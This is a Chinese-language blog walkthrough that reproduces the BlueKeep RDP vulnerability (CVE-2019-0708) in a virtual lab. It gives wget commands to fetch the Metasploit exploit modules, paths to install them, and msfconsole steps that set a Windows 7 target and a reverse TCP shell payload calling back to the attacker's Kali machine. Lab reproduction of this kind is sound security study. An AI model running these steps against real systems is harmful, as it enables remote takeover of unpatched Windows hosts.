复现cve-2019-0708

前几天从公众号看到了cve-2019-0708 poc 非蓝屏poc发布出来了,遂跟着复现一下。

具体地址忘记了,就百度了一个 blog 大家随便看看

好了开始

先给出 poc地址

环境:vm 15

kali 最新版 ,win7 sp1 企业版(关闭防火墙,开启远程桌面服务)

  1. 下载msf 需要替换和添加的rb脚本

    1
    2
    3
    4
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  2. 替换原msf里部分rb脚本

    1
    2
    3
    4
    rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

这里强调一下,要把msf原有替换的rb脚本最好备份一下。

  1. 进入 msfconsole

    1567961143191

  2. 重载模块reload_all

    1567961179580

  3. 搜索cve_2019_0708_bluekeep_rce这个模块,关键词可以选择bluekeep或者0708

    1567961283984

  4. 使用这个exp,并查看相关信息

    1
    2
    3
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    show options
    show info

    1567961479827

  5. 设置rhosts ip (其实就是被攻击的ip即win7的),设置目标系统,目标系统有5个选项,可以根据实际情况来选,我这里的win7 是vm的虚拟机,所以选择3

    1567961784177

    1567961812168

  6. 设置payload及LHOST(反弹回连的ip即kali的ip)

    set payload windows/x64/shell/reverse_tcp

    1567962053039

    1567962147797

  7. 再次运行一次options 看看设置参数

    1567962312957

  8. check检查下看看(其实也可以不用这一步,直接允许exploit或者run也可以)

    1567962415464

  9. 看到提示了,表示有漏洞,可以进行下一步

    1567962597512

  10. 至此,成功复现,注意win7版本,sp1 7601 不能是家庭版。

1567962697425

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. 好了开始
,